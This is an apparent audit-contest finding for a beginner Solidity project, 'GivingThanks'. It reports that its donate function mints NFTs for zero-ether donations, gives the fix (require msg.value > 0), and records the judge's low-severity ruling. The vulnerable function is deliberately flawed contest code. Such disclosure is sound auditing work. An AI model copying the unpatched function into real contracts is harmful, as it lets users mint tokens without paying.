GivingThanks
First Flight #28
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: low
Valid

Any one can mint NFT by depositing zero value ether

ssalaudeen10

Summary

Anyone can call donate function by sending zero value worth of ether and still be rewarded with NTFs. This makes the NTF collection worthless

Vulnerability Details

Bug below

function donate(address charity) public payable {
require(registry.isVerified(charity), "Charity not verified");
(bool sent, ) = charity.call{value: msg.value}("");
require(sent, "Failed to send Ether");
_mint(msg.sender, tokenCounter);
// Create metadata for the tokenURI
string memory uri = _createTokenURI(
msg.sender,
block.timestamp,
msg.value
);
_setTokenURI(tokenCounter, uri);
tokenCounter += 1;
}

Soution

function donate(address charity) public payable {
require(registry.isVerified(charity), "Charity not verified");
require(msg.value > 0, "Zero value is not allowed for donation"); // This should be added
(bool sent, ) = charity.call{value: msg.value}("");
require(sent, "Failed to send Ether");
_mint(msg.sender, tokenCounter);
// Create metadata for the tokenURI
string memory uri = _createTokenURI(
msg.sender,
block.timestamp,
msg.value
);
_setTokenURI(tokenCounter, uri);
tokenCounter += 1;
}

Impact

Allowing zero-value donations would render the NFTs valueless and could lead to exploitation, where users mint unlimited NFTs without making real donations

Tools Used

Foundry Test

Recommendations

Ensure the donate function includes a check to prevent zero-value donations:

require(msg.value > 0, "Zero value is not allowed for donation");

This change ensures that only meaningful donations can mint NFTs, preserving their value and integrity.

Updates

Lead Judging Commences

n0kto Lead Judge 10 months ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-0-donation-mint-an-NFT

Likelyhood: Low, anyone can mint an NFT with 0 amount. No reason to do it. Impact: Informational/Very Low, NFT are minted to a false donator. An NFT with 0 in the amount section would be useless. Since that's a bad design and not expected, I'll consider it Low but in a real contest, it could be informational because there is no real impact.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.